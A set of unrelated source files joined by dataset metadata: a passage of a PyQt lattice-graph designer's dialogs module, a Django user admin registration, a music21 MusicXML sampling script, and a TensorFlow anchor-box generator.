self.parent.UC.add_vertices_using_symops(sites, symops_list, \n self.radioButton_diffTypes.isChecked())\n self.parent.cluster = CrystalCluster(self.parent.UC,\n self.parent.lattice,\n self.parent.size)\n self.parent.ax.clear()\n self.parent.gee = GraphEdgesEditor(self.parent.ax, self.parent.cluster, \n parent = self.parent, \n display_report = self.parent.TEXT_MODE) \n self.parent.canvas.draw()\n \n msg = \" {} vertices were created\".format(self.parent.UC.num_vertices) \n self.parent.statusBar().showMessage(msg, 2000)\n if self.parent.TEXT_MODE:\n print(msg)\n \n self.parent.fileNameXML = None\n self.parent.LATTICEGRAPH_name = \"None\"\n self.parent.label_fileNameXML.setText(\"XML library file: None\")\n self.parent.label_LG_name.setText(\"Lattice graph name: None\")\n \n self.parent.unitCellChanged.emit() \n\n def process_cif_callback(self):\n '''get fileName from file dialog and process cif file'''\n \n output = QFileDialog.getOpenFileName(self, \n 'Open Crystallographic Information File',\n filter = \"CIF (*.cif);;All files (*.*)\") \n fileName = getPathString(output)\n \n if fileName == \"\":\n return\n else:\n self.process_cif(fileName) \n\n def process_cif(self, fileName, TESTING=False):\n '''parse lattice parameters from cif file'''\n \n abc, angles, UC_data, sg_data = self.parse_cif_file(fileName)\n \n # select atoms sites to consider in model\n \n self.dlg = DialogSelectSites(data = UC_data)\n \n if TESTING:\n self.dlg.ok_callback() \n \n elif not self.dlg.exec_():\n return\n \n sitesDatatext = self.dlg.atomsText\n \n # initialize widget\n \n self.lineEdit_a.setText(str(abc[0]))\n self.lineEdit_b.setText(str(abc[1]))\n self.lineEdit_c.setText(str(abc[2]))\n\n self.lineEdit_alpha.setText(str(angles[0])) \n self.lineEdit_beta.setText(str(angles[1])) \n self.lineEdit_gamma.setText(str(angles[2])) \n\n self.textEdit_symops.setText(\"\\n\".join(sg_data))\n self.textEdit_atoms.setText(sitesDatatext)\n \n def parse_cif_file(self, fileName): \n '''\n read and process data from cif file\n \n return:\n\n abc = [a,b,c] - list of unit cell length\n angles = [alpha, beta, gamma] - list of unit cell angles \n UC_data = [site, ... ] - list of unit cell sites labels and coordinates\n where: site = {'bool':_ ,'label':_, 'type':_, 'x':_, 'y':_, 'z':_}\n site['bool'] - defines wheather to use site in the model \n sg_data = ['x, y, z', ...] - space group symmetry operation list\n \n ''' \n with open(fileName, 'r') as f:\n read_data = f.read()\n \n read_data = read_data.replace(\"\\r\",\"\")\n read_data = read_data.replace(\"\\n \\n\",\"\\n\\n\")\n blocks = read_data.split(\"\\n\\n\")\n \n abc, angles = self.get_lattice_data(blocks)\n UC_data = self.get_UC_data(blocks)\n sg_data = self.get_sg_data(blocks)\n \n return abc, angles, UC_data, sg_data\n\n\n def get_lattice_data(self, blocks):\n '''return lattice parameters data'''\n \n keys = [\"_cell_length_a\", \"_cell_length_b\", \"_cell_length_c\",\n \"_cell_angle_alpha\", \"_cell_angle_beta\", \"_cell_angle_gamma\"]\n \n latttice_block = self.get_block_by_word(blocks, \"_cell_length_a\")\n data = []\n for key in keys:\n for line in latttice_block.splitlines():\n if key in line:\n data.append(self._float(line.split()[-1]))\n break\n return data[:3], data[3:] \n \n def get_UC_data(self, blocks):\n '''return unit cell data'''\n \n keys = [\"_atom_site_label\", \"_atom_site_type_symbol\",\n \"_atom_site_fract_x\", \"_atom_site_fract_y\", \"_atom_site_fract_z\"]\n \n UC_block = self.get_block_by_word(blocks, \"_atom_site_fract_x\") \n data = self.get_list_val(UC_block, keys)\n # turn to float site coords\n data = [[val if j<2 else self._float(val) for j, val in enumerate(line)] for line in data]\n\n data_keys = [\"label\", \"type\", \"x\", \"y\", \"z\"]\n data = [{data_keys[j]:val for j, val in enumerate(line)} for line in data]\n for line in data:\n line[\"bool\"] = line[\"type\"] in [\"Cu\"] # automaticly selected atoms\n \n return data \n \n def get_sg_data(self, blocks):\n '''return space group symmetry operations'''\n \n keys = [\"_space_group_symop_operation_xyz\"]\n sg_block = self.get_block_by_word(blocks, keys[0])\n data = self.get_list_val(sg_block, keys)\n data = [line[0] for line in data]\n \n return data\n\n # helper functions\n \n def get_block_by_word(self, blocks, word):\n '''helper: return block if it contains a word'''\n for block in blocks:\n if word in block:\n return block\n \n def _float(self, string):\n '''helper: return string without precision parenthesis: 1.23(3)'''\n return float(string.split(\"(\")[0])\n \n def words_split(self, line):\n '''split line on words counting symbols between \" chars as single word'''\n \n new_line = []\n in_word = False\n j0 = 0\n for j, char in enumerate(line):\n if (char == \"'\") or (char == \"\\\"\"):\n if in_word:\n new_line.append(line[j0:j])\n else:\n new_line += line[j0:j].split(' ')\n \n in_word = not in_word\n j0 = j+1\n \n new_line += line[j0:].split(' ')\n new_line = [elem for elem in new_line if elem != \"\"] \n \n return new_line\n \n def get_list_val(self, block, keys):\n '''return data list according to keys in _loop block'''\n \n lines = block.split(\"loop_\")[-1].splitlines()\n lines = [line for line in lines if line != \"\"]\n all_keys = [line.strip() for line in lines if \"_\" in line]\n all_line_vals = lines[len(all_keys):]\n \n data = []\n for line in all_line_vals:\n data_line = [] \n for j, val in enumerate(self.words_split(line)):\n if all_keys[j] in keys:\n data_line.append(val)\n data.append(data_line)\n \n return data \n \n \n# Preference dialog classes\n\n \nclass QColorListItemWidget(QWidget, Ui_myColorListItem):\n '''widget for setting listWidget parameters: label, bool, color'''\n\n def __init__ (self, parent=None):\n super(QColorListItemWidget, self).__init__(parent)\n self.setupUi(self) \n \n # \"overload\" colorBtn \n self.horizontalLayout.removeWidget(self.colorBtn)\n self.colorBtn.setParent(None)\n self.colorBtn.deleteLater() \n self.colorBtn = QColorButton()\n self.horizontalLayout.addWidget(self.colorBtn)\n \n def set_data(self, data, strFlag=False):\n '''\n data - dictionary with corresponding keys\n if strFlag = True return input data has str format\n\n '''\n if data.get(\"label\") is not None: self.label.setText(str(data[\"label\"]))\n if data.get(\"bool\") is not None: \n self.checkBox.setChecked((data[\"bool\"]==\"True\") if strFlag else data[\"bool\"])\n if data.get(\"color\") is not None: self.colorBtn.set_color(data[\"color\"])\n \n def get_data(self):\n '''return widgets data'''\n \n data = {\"label\": str(self.label.text()),\n \"bool\": self.checkBox.isChecked(),\n \"color\": self.colorBtn.get_color()}\n \n return data \n \n\nclass QGraphElemPreference(QCustomListWidget_Add):\n '''toolBox for manipulating vertices and edges preferences'''\n \n def __init__ (self, label=\"myLabel\", initializationData=[]):\n '''label = Vertices or 'Edges'. '''\n\n if initializationData == []:\n initializationData = self.create_initalizing_data()\n \n super(QGraphElemPreference, self).__init__(QColorListItemWidget, initializationData)\n self.sliderSize = QSlider(Qt.Horizontal)\n self.labelSize = QLabel(\"Size: \")\n self.hbox_size = QHBoxLayout()\n self.hbox_size.addWidget(self.labelSize)\n self.hbox_size.addWidget(self.sliderSize)\n self.label = label \n self.labelQ = QLabel(self.get_labelStr())\n self.labelQ.setAlignment(Qt.AlignCenter) \n sizePolicy = QSizePolicy(QSizePolicy.Expanding,QSizePolicy.Fixed)\n self.labelQ.setSizePolicy(sizePolicy)\n #change order of btnAdd\n self.vbox.insertLayout(0,self.hbox_size) \n self.vbox.insertWidget(0,self.labelQ)\n \n def add_item_callback(self): \n '''overloaded method'''\n newItem = self.QCustomWidget()\n newItem.set_data({\"label\": \"type {}\".format(self.listWidget.count()),\n \"bool\": True,\n \"color\": None})\n self.listWidget.add_item(newItem)\n self.listWidget.scrollToBottom()\n self.labelQ.setText(self.get_labelStr())\n \n def get_labelStr(self):\n '''get label string'''\n \n return self.label+\" ({})\".format(self.listWidget.count())\n \n def get_data_ET(self, tag):\n '''get xml ElementTree containing preferences data'''\n \n SETTINGS = ET.Element(tag)\n \n SIZE = ET.Element(\"SIZE\")\n SIZE.set(\"size\", str(self.sliderSize.value()))\n SETTINGS.append(SIZE) \n dataList = self.listWidget.get_data()\n \n for data in dataList:\n PREFERENCE = ET.Element(\"PREFERENCE\")\n for key, val in data.items():\n PREFERENCE.set(key, str(val))\n SETTINGS.append(PREFERENCE)\n \n return SETTINGS\n \n def set_data_ET(self, root):\n '''get xml ElementTree containing preferences data'''\n \n self.sliderSize.setValue(float(root.find(\"SIZE\").get(\"size\")))\n data_list = []\n for item in root.findall(\"PREFERENCE\"):\n data_list.append(item.attrib)\n self.listWidget.set_data(data_list, strFlag = True)\n self.labelQ.setText(self.get_labelStr())\n \n def create_initalizing_data(self):\n '''returns default initializing data for QCustomListWidget'''\n \n clrs = [u'#00aaff', u'#ff0000', u'#ffff7f', u'#ffaaff', u'#aaffff',\n u'#ffaa7f', u'#a3ff82', u'#5500ff', u'#aa007f', u'#ffffff'] \n \n data = [{\"label\":\"type %s\"%j,\"bool\":True,\"color\":clr} for j,clr in enumerate(clrs)]\n \n return data\n\n\nclass MyWidgetPreferences(WidgetPreferences, Ui_WidgetPreferences):\n '''widget used for setting up mpl manipulation pane preferences'''\n \n def __init__ (self):\n \n super(MyWidgetPreferences, self).__init__()\n self.setupUi(self)\n \n # \"overload\" colorBtn \n for btnItem in [self.btn_backColor,\n self.btn_latticeColor,\n self.btn_activateColor]: \n self.hbox_colors.removeWidget(btnItem)\n btnItem.setParent(None)\n btnItem.deleteLater()\n \n self.btn_backColor = QColorButton()\n self.hbox_colors.insertWidget(1,self.btn_backColor)\n self.btn_latticeColor = QColorButton()\n self.hbox_colors.insertWidget(4,self.btn_latticeColor)\n self.btn_activateColor = QColorButton()\n self.hbox_colors.insertWidget(7,self.btn_activateColor) \n\n # \"overload\" edgePref/vertPref \n for prefItem in [self.edgePref, self.vertPref]: \n self.hbox_pref.removeWidget(prefItem)\n prefItem.setParent(None)\n prefItem.deleteLater()\n self.edgePref = QGraphElemPreference(\"Edges\")\n self.hbox_pref.addWidget(self.edgePref)\n self.vertPref = QGraphElemPreference(\"Vertices\")\n self.hbox_pref.addWidget(self.vertPref)\n \n def set_theme_ET(self, THEME):\n '''initialize preference widget according to THEME ElementTree''' \n\n self.checkBox_arrows.setChecked(THEME.find(\"VISIBLEARROWS\").get(\"value\") == \"True\")\n self.checkBox_lattice.setChecked(THEME.find(\"VISIBLELATTICE\").get(\"value\") == \"True\")\n self.btn_backColor.set_color(THEME.find(\"COLORBACKGROUND\").get(\"value\"))\n self.btn_latticeColor.set_color(THEME.find(\"COLORLATTICE\").get(\"value\"))\n self.btn_activateColor.set_color(THEME.find(\"COLORACTIVATE\").get(\"value\"))\n self.edgePref.set_data_ET(THEME.find(\"EDGES\"))\n self.vertPref.set_data_ET(THEME.find(\"VERTICES\"))\n \n def get_current_theme_ET(self):\n '''get xml ElementTree containing setting data in preference widget'''\n \n THEME = ET.Element(\"THEME\")\n THEME.set('name',self.curent_theme_name)\n \n tagsList = [\"VISIBLEARROWS\",\"VISIBLELATTICE\", \n \"COLORBACKGROUND\",\"COLORLATTICE\",\"COLORACTIVATE\"]\n getValList = [self.checkBox_arrows.isChecked(),self.checkBox_lattice.isChecked(), \n self.btn_backColor._color, self.btn_latticeColor._color, self.btn_activateColor._color]\n\n for tag, val in zip(tagsList,getValList): \n item = ET.Element(tag)\n item.set('value',str(val))\n THEME.append(item)\n \n THEME.append(self.edgePref.get_data_ET(\"EDGES\"))\n THEME.append(self.vertPref.get_data_ET(\"VERTICES\"))\n \n return DealXML.prettify(THEME)\n \nclass MyDialogPreferences(DialogPreferences):\n '''Preference manager dialog used for setting up mpl manipulation pane'''\n \n def __init__(self, parent):\n DialogPreferences.__init__(self, parent = parent,\n WidgetPreferencesClass = MyWidgetPreferences)\n \n\n# classes for manipulating edges relating to their length\n\n\nclass QDistListItemWidget(QWidget, Ui_myDistListItem):\n '''widget for setting listWidget parameters: bool, type, dist, err'''\n\n def __init__ (self, parent=None):\n super(QDistListItemWidget, self).__init__(parent)\n self.setupUi(self)\n \n self.lineEdit_dist.textEdited.connect(self.activate_checkbox)\n self.lineEdit_err.textEdited.connect(self.activate_checkbox)\n self.spinBox.valueChanged.connect(self.activate_checkbox)\n \n def activate_checkbox(self):\n self.checkBox.setChecked(True)\n \n def set_data(self, data, strFlag=False):\n \n if data.get(\"bool\") is not None: self.checkBox.setChecked(data[\"bool\"])\n if data.get(\"type\") is not None: self.spinBox.setValue(data[\"type\"])\n if data.get(\"dist\") is not None: self.lineEdit_dist.setText(str(data[\"dist\"]))\n if data.get(\"err\") is not None: self.lineEdit_err.setText(str(data[\"err\"]))\n if data.get(\"found\") is not None: self.set_found(data[\"found\"])\n \n def get_data(self): \n\n data = {\"bool\":self.checkBox.isChecked(), \"type\":self.spinBox.value(),\n \"dist\":self.get_dist(), \"err\":float(self.lineEdit_err.text())} \n \n return data \n \n def get_dist(self):\n srtDist = self.lineEdit_dist.text()\n return 0 if srtDist == \"\" else float(srtDist) \n \n def set_found(self, val): \n self.label_found.setText(\"{} edges found\".format(val))\n \n \nclass MyDistToolBox(QCustomListWidget_Add):\n '''toolBox for manipulating edges by their length'''\n \n def __init__ (self, default_data = []):\n '''''' \n super(MyDistToolBox, self).__init__(QDistListItemWidget, default_data)\n \n sizePolicy = QSizePolicy(QSizePolicy.Maximum,QSizePolicy.Fixed)\n text = \"Provide edges type, distance between atoms, and tolerance (%):\"\n self.label = QLabel(text)\n self.label.setSizePolicy(sizePolicy)\n self.vbox.insertWidget(0,self.label)\n self.vbox.removeWidget(self.btnAdd) \n self.btnAdd.setText(\"+\")\n self.btnAdd.setSizePolicy(sizePolicy)\n self.btnAdd.setMaximumWidth(40) \n self.btnRemove = QPushButton(\"-\")\n self.btnRemove.setSizePolicy(sizePolicy)\n self.btnRemove.setMaximumWidth(40) \n self.btnSearch = QPushButton(\"Search\")\n self.btnClose = QPushButton(\"Close\")\n self.btnSearch.setDefault(True)\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.btnAdd)\n hbox.addWidget(self.btnRemove)\n hbox.addStretch(1)\n hbox.addWidget(self.btnSearch)\n hbox.addWidget(self.btnClose)\n \n self.vbox.addLayout(hbox)\n\n self.btnRemove.clicked.connect(self.remove_item_callback)\n \n def remove_item_callback(self):\n for item in self.listWidget.selectedItems():\n self.listWidget.takeItem(self.listWidget.row(item))\n\n\nclass DialogDistSearch(QDialog, MyDistToolBox):\n '''dialog for manipulating edges relating to their length'''\n \n def __init__(self, parent):\n \n super(DialogDistSearch, self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n \n self.parent = parent\n self.update()\n \n self.vbox.setContentsMargins(9,15,9,9)\n self.vbox.setSpacing(10)\n self.setWindowTitle(\"Manipulate the edges relating to their length\")\n \n self.listWidget.currentItemChanged.connect(self.selectDistList_callback) \n self.parent.selectedEdgeChanged.connect(self.selectEdgeSignal_slot)\n self.parent.unitCellChanged.connect(self.update)\n self.btnSearch.clicked.connect(self.search_callback)\n self.btnClose.clicked.connect(self.close_callback)\n \n QShortcut(QKeySequence(\"Del\"), self, self.parent.gee.delete_active_edge_callback)\n QShortcut(QKeySequence(\"Shift+Del\"), self, self.parent.gee.clearEdges_callback)\n\n def update(self):\n '''update listWidget'''\n\n self.initialization = True # block QListWidget valuechanged callback\n \n # read data from parent unitcell\n init_data = []\n for length, ids in self.parent.UC.lengthDic.items():\n init_data.append({\"bool\": True, \n \"type\":self.parent.UC.edges[ids[0]].type, \n \"dist\":length,\n \"err\":1,\n \"found\":len(ids)})\n init_data.append({}) # add one empty item\n self.listWidget.set_data(init_data)\n # select empty item (the last)\n lastItemID = self.listWidget.count() - 1\n self.listWidget.setCurrentItem(self.listWidget.item(lastItemID)) \n \n # create binding dictionaries\n self.distToListItem, self.itemIDToDist = {}, {}\n for j in range(self.listWidget.count()):\n self.distToListItem[init_data[j].get(\"dist\")] = self.listWidget.item(j)\n self.itemIDToDist[j] = init_data[j].get(\"dist\")\n \n self.initialization = False # relieze QListWidget valuechanged callback\n \n def search_callback(self):\n '''searching edges by their length given in listWidget'''\n \n self.parent.UC.clearEdges()\n \n for dataDic in self.listWidget.get_data():\n if (dataDic is not None) and dataDic[\"bool\"]:\n search = self.parent.cluster.edges.search_edges_by_dist\n search(dataDic[\"type\"], dataDic[\"dist\"], dataDic[\"err\"])\n \n # show message \n dist = dataDic[\"dist\"]\n edgesList = self.parent.UC.lengthDic.get(dist)\n num = 0 if edgesList is None else len(edgesList)\n msg = ' {0} edges were found with dist={1:.3f}'.format(num,dist) \n self.parent.statusBar().showMessage(msg, 2000)\n if self.parent.TEXT_MODE:\n print(msg)\n\n # make chnages on mpl_pane\n self.parent.gee.create_artists_graph()\n self.parent.gee.set_artists_properties()\n self.parent.unitCellChanged.emit()\n self.parent.selectedEdgeChanged.emit(None)\n \n def selectDistList_callback(self, selectedItem):\n '''select edges from listWidget according to their length'''\n \n if not self.initialization:\n activeDist = self.itemIDToDist[self.listWidget.row(selectedItem)]\n if activeDist is None:\n self.edgesIDs = []\n else:\n self.edgesIDs = self.parent.UC.lengthDic[activeDist][:]\n \n self.parent.gee.select_edges(self.edgesIDs)\n \n if activeDist is None:\n msg = \" active edges unselected\"\n else:\n msg = \" selected {0} edges with length: {1}\".format(len(self.edgesIDs), activeDist)\n\n self.parent.statusBar().showMessage(msg, 2000)\n \n if self.parent.TEXT_MODE:\n print(msg)\n \n def add_item_callback(self):\n '''add item to the list toolbox'''\n MyDistToolBox.add_item_callback(self)\n self.itemIDToDist[self.listWidget.count()-1] = None\n\n def remove_item_callback(self):\n '''remove item from the list toolbox'''\n self.parent.gee.delete_active_edge_callback()\n \n def selectEdgeSignal_slot(self, activeEdge_id):\n '''when edge is selected at maniplation mpl_pane'''\n \n if activeEdge_id is None:\n dist = None\n else:\n dist = self.parent.UC.edges[activeEdge_id].length\n \n activeItem = self.distToListItem[dist]\n self.listWidget.setCurrentItem(activeItem)\n \n def close_callback(self):\n '''overload close in order to stop distEdge interaction mode'''\n self.parent.gee.select_edges([])\n self.reject()\n \n def closeEvent(self, evnt):\n '''overload close in order to stop distEdge interaction mode'''\n self.parent.gee.select_edges([])\n super(DialogDistSearch, self).closeEvent(evnt)\n \n \n#############################################################################\n\n\nif __name__ == '__main__':\n\n # test classes \n \n from core import Vertex, Edge\n import matplotlib.pyplot as plt\n \n # imports requied PyQt modules\n if pyQtVersion == \"PyQt4\":\n from PyQt4.QtCore import QObject\n from PyQt4.QtGui import QApplication\n else:\n from PyQt5.QtCore import QObject\n from PyQt5.QtWidgets import QApplication\n \n import sys\n \n \n class TestMainWindow(QObject):\n '''class for testing interaction of dialogs with MainWindow'''\n \n selectedEdgeChanged = pyqtSignal(object)\n selectedEdgeChangedList = pyqtSignal(object) #when edge selected in QListWidget\n unitCellChanged = pyqtSignal()\n latticeVisibleChanged = pyqtSignal(object) # used to bind with mpl.event\n arrowsVisibleChanged = pyqtSignal(object) # used to bind with mpl.event\n \n class Label(object):\n def __init__(self): pass\n def setText(self, text): pass\n \n class RadioButton(object):\n def __init__(self): pass\n def setChecked(self, _bool): pass\n \n class statusBar(object):\n def __init__(self): pass\n def showMessage(msg=\"\", sec=2000): pass\n \n def __init__ (self):\n \n super(TestMainWindow, self).__init__()\n \n self.prefFileName = \"preferences.xml\"\n self.fileNameXML = None\n self.label_fileNameXML = None\n self.LATTICEGRAPH_name = \"testGraph\"\n self.label_fileNameXML = self.Label()\n self.label_LG_name = self.Label()\n \n self.SETTINGS = ET.parse(self.prefFileName).getroot()\n self.CURRENT_THEME = DealXML.get_child_by_name(self.SETTINGS,\"THEME\",\"Current theme\") \n self.TEXT_MODE = True\n self.radioButton_output = self.RadioButton()\n \n basisMatrix = np.array([[1,0,0],[0,1,0],[0,0,1.3]])\n self.lattice = Lattice(basisMatrix=basisMatrix) \n self.UC = UnitCell(self.lattice)\n self.UC.add_vertex(Vertex(0,0,[0.2,0.2,0.2]))\n self.UC.add_vertex(Vertex(0,0,[0.3,0.3,0.6]))\n self.UC.add_edge(Edge(0,1,(1,2),(0,0,0)))\n self.UC.add_edge(Edge(0,2,(2,1),(0,0,1)))\n self.UC.add_edge(Edge(0,0,(1,1),(1,0,0)))\n self.UC.add_edge(Edge(0,0,(1,1),(0,1,0)))\n self.UC.add_edge(Edge(0,0,(2,2),(1,0,0)))\n self.UC.add_edge(Edge(0,0,(2,2),(0,1,0)))\n self.size = (2,2,2)\n self.cluster = CrystalCluster(self.UC, self.lattice, self.size)\n \n fig = plt.figure('Graph edges editor', figsize = (6,6))\n self.ax = fig.gca(projection='3d')\n self.gee = GraphEdgesEditor(self.ax, self.cluster, parent = self, \n display_report = True)\n self.canvas = fig.canvas\n plt.show()\n self.que = []\n \n def getFileLabelText(self):\n return \"None\"\n \n def importXml(self, LG_name):\n \n if self.parser is None:\n raise ValueError(\"Parser is not defined\")\n self.lattice, self.UC = self.parser.parse_LATTICEGRAPH(self.LATTICEGRAPH_name)\n self.cluster = CrystalCluster(self.UC, self.lattice, self.size)\n self.ax.clear()\n self.gee = GraphEdgesEditor(self.ax, self.cluster, parent = self, \n display_report = True)\n self.canvas.draw()\n \n # test methonds\n \n def addToQue(self, myQlg):\n '''used to show dialogs in sequence while not blocking the mainWindow'''\n \n if len(self.que) == 0:\n self.showFromQue(myQlg)\n else:\n self.que[-1].rejected.connect(lambda: self.showFromQue(myQlg))\n \n self.que.append(myQlg)\n \n def showFromQue(self, myQlg): \n print(\"\\n# run {} test\".format(type(myQlg)))\n myQlg.show()\n \n def testDialog(self, QDlg):\n '''testing interaction of QDlg with MainWindow'''\n self.myQDlg = QDlg(self) #pass parent\n self.addToQue(self.myQDlg)\n \n def testQPreferencesManager(self):\n \n def applyPref_callback():\n '''when apply button is cklicked in DialogPreferences'''\n self.gee.initialize_theme(self.CURRENT_THEME)\n self.gee.set_artists_properties()\n \n self.myQDlg = MyDialogPreferences(parent = self)\n self.myQDlg.applySignal.connect(applyPref_callback)\n self.addToQue(self.myQDlg) \n \n def testQDialogExportAnim(self):\n \n from widgets.QDialogExportAnim import DialogExportAnim\n self.myQDlg = DialogExportAnim(self.ax)\n self.myQDlg.stop_callback()\n if len(self.que) == 0:\n self.myQDlg.start_callback()\n else:\n self.que[-1].rejected.connect(self.myQDlg.start_callback)\n self.addToQue(self.myQDlg) \n \n \n def showInDialog(widget):\n '''used for displaying widgets in dialog during test'''\n \n dlg = QDialog()\n widget.setParent(dlg)\n vbox = QHBoxLayout()\n vbox.setContentsMargins(0, 0, 0, 0)\n vbox.setSpacing(0)\n vbox.addWidget(widget)\n dlg.setLayout(vbox)\n dlg.exec_()\n \n \n def test_QGraphElemPreference():\n '''testing interaction with QGraphElemPreference via ElementTree object'''\n \n print(\"\\n# run {} test\\n\".format(QGraphElemPreference))\n \n myQGraphElemPreference = QGraphElemPreference(\"Vertices\")\n elem = myQGraphElemPreference.get_data_ET(\"VERTICES\") # get ET from widget\n \n print(\" myQGraphElemPreference.get_data_ET() test\\n\")\n ET.dump(DealXML.prettify(elem))\n myQGraphElemPreference.set_data_ET(elem) # initialize widget with ET\n \n showInDialog(myQGraphElemPreference)\n \n def test_MyWidgetPreferences():\n '''testing interaction with MyWidgetPreferences via ElementTree object'''\n \n print(\"\\n# run {} test\\n\".format(MyWidgetPreferences))\n \n myWidgetPreferences = MyWidgetPreferences()\n\n xmlText = '''\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n'''\n THEME = ET.fromstring(xmlText) \n \n print(\" MyWidgetPreferences.set_theme_ET() test\\n\")\n myWidgetPreferences.set_theme_ET(THEME)\n print(\" MyWidgetPreferences.get_current_theme_ET() test\\n\")\n ET.dump(myWidgetPreferences.get_current_theme_ET()) # get ET from widget\n \n showInDialog(myWidgetPreferences)\n \n \n def run_test():\n \n print(\"\\n {} is imported\".format(pyQtVersion))\n \n app = QApplication([])\n \n # creating TestDialogDistSearch\n myTestMainWindow = TestMainWindow()\n \n # testing\n myTestMainWindow.testDialog(DialogImportCryst)\n# myTestMainWindow.testDialog(DialogEditXML)\n# myTestMainWindow.testDialog(DialogDistSearch)\n \n# test_QGraphElemPreference()\n# test_MyWidgetPreferences()\n# myTestMainWindow.testQPreferencesManager()\n \n# myTestMainWindow.testQDialogExportAnim()\n \n sys.exit(app.exec_())\n\n############################################################################\n \n run_test()\n\n","repo_name":"luchko/latticegraph_designer","sub_path":"latticegraph_designer/app/dialogs.py","file_name":"dialogs.py","file_ext":"py","file_size_in_byte":49775,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"99"} +{"seq_id":"20545270405","text":"from django.contrib.auth.admin import UserAdmin\nfrom django.contrib import admin\nfrom . import models\n\n\n\n# Register your models here.\n\n# 관리자 페이지에서 모델User를 관리 할수있는 클래스 설정\n# 9번 줄은 10번 클래스가 동작할수있게하는 부분\n# list_display는 행으로 보이고자하는거, \n# list_filter는 조건에 따라 선택적인 내용만 얻을 수있게 도와주는애\n@admin.register(models.User)\nclass CustomUserAdmin(UserAdmin):\n \n \"\"\"Custom User Admin\"\"\"\n\n fieldsets = UserAdmin.fieldsets +(\n (\n \"Custom Profile\",\n {\n \"fields\":(\n \"avatar\",\n \"gender\",\n \"bio\",\n \"birthdate\",\n \"language\",\n \"currency\",\n \"superhost\",\n )\n }\n ),\n )\n","repo_name":"t08361/airbnb-clone","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"20264800197","text":"import play\nimport random\nimport string\nimport numpy as np\n\nfrom music21 import *\nfrom os import sys, walk\n\ndef fix(freq):\n notes = play.get_piano_notes()\n res = ''\n for x in notes.keys():\n if (abs(notes[x]-freq) < abs(notes[res]-freq)):\n res = x\n return res\n\ndef trans(dura_type):\n if (dura_type == 'whole'):\n return 32\n elif (dura_type == 'half'):\n return 16\n elif (dura_type == 'quarter'):\n return 8\n elif (dura_type == 'eighth'):\n return 4\n elif (dura_type == '16th'):\n return 2\n elif (dura_type == '32nd'):\n return 1\n print (dura_type)\n return None\n\nsys.stdout = open(\"data.txt\", \"w\")\n\nfor (_, __, file) in walk('./xml'):\n for s in file:\n if (s[0] == '.'):\n continue\n\n b = converter.parse('./xml/' + s)\n TS = b.recurse().getElementsByClass('TimeSignature')[0]\n\n if (TS.ratioString != '4/4'):\n continue\n\n cases = 6\n __collect = []\n print ('Loading from ' + s)\n\n while (cases > 0):\n flag = True\n __note = []\n __dura = []\n\n PN = random.randint(0, 1)\n MN = random.randint(0, len(b.getElementsByClass(stream.Part)[PN].getElementsByClass(stream.Measure)) - 5)\n \n for m in range(MN, MN + 4):\n total = 0\n for n in b.getElementsByClass(stream.Part)[PN].getElementsByClass(stream.Measure)[m]:\n\n interval = 0\n if (type(n) == note.Note):\n __note.append(fix(n.pitch.frequency))\n interval = trans(n.duration.type)\n __dura.append(32 // interval)\n elif (type(n) == note.Rest):\n __note.append('')\n interval = trans(n.duration.type)\n __dura.append(32 // interval)\n elif (n.duration.type != 'zero'):\n flag = False\n total += interval\n \n if ((not flag)):\n break\n if (total != 32):\n __note.append('')\n __dura.append(32 / (32 - total))\n\n if (not flag):\n continue\n\n cases -= 1\n __collect.append((__note, __dura))\n\n for d in range(2):\n for i in range(len(__collect)):\n print (__collect[i][d], ',')\n print ()\n print ()\n","repo_name":"PisonJay/GeneMusic","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"31841877004","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np \nimport tensorflow as tf\n\nclass Anchor(object):\n\n def __init__(self, base_size = 16, ratios=[0.5,1,2], scales=2**np.arange(3,6)):\n self._base_size = base_size\n self._ratios = ratios\n self._scales = scales\n self._anchors = []\n\n def generate(self):\n base_anchor = np.array([1,1,self._base_size, self._base_size]) - 1\n ratio_anchors = self._ratio_enum(base_anchor, self._ratios)\n self._anchors = np.vstack([self._scale_enum(ratio_anchors[i,:], self._scales) for i in range(ratio_anchors.shape[0])])\n return self._anchors\n\n def _coords(self, anchor):\n w = anchor[2] - anchor[0] + 1\n h = anchor[3] - anchor[1] + 1\n x_center = anchor[0] + 0.5 * (w - 1)\n y_center = anchor[1] + 0.5 * (h - 1)\n return w, h, x_center, y_center\n\n def _ratio_enum(self, anchor, ratios):\n w, h, x_center, y_center = self._coords(anchor)\n size = w * h\n size_ratios = size / ratios\n ws = np.round(np.sqrt(size_ratios))\n hs = np.round(np.sqrt(ws * ratios))\n return self._make_anchors(ws,hs,x_center, y_center)\n\n def _make_anchors(self, ws, hs, x_center, y_center):\n ws = ws[:, np.newaxis]\n hs = hs[:, np.newaxis]\n return np.hstack((x_center - 0.5 * (ws - 1),\n y_center - 0.5 * (hs - 1),\n x_center + 0.5 * (ws - 1),\n y_center + 0.5 * (hs - 1)))\n \n def _scale_enum(self, anchor, scales):\n w, h, x_center, y_center = self._coords(anchor)\n ws = w * scales\n hs = h * scales\n return self._make_anchors(ws, hs, x_center, y_center)\n\n @staticmethod\n def generate_anchors_initial(height, width, stride=16, scales=(8,16,32), ratios=(0.5,1,2)):\n shift_x = tf.range(width) * stride\n shift_y = tf.range(height) * stride\n shift_x, shift_y = tf.meshgrid(shift_x,shift_y)\n sx = tf.reshape(shift_x, shape=(-1,))\n sy = tf.reshape(shift_y, shape=(-1,))\n shifts = tf.transpose(tf.stack([sx,sy,sx,sy]))\n K = tf.multiply(width,height)\n shifts = tf.transpose(tf.reshape(shifts, shape=[1,K,4]),perm=(1,0,2))\n a = Anchor(ratios=np.array(ratios),scales=np.array(scales))\n anchors = a.generate()\n A = anchors.shape[0]\n anchor_constant = tf.constant(anchors.reshape((1,A,4)), dtype=tf.int32)\n length = K * A\n result = tf.reshape(tf.add(anchor_constant, shifts), shape=(length, 4))\n return tf.cast(result, dtype=tf.float32), length\n\n 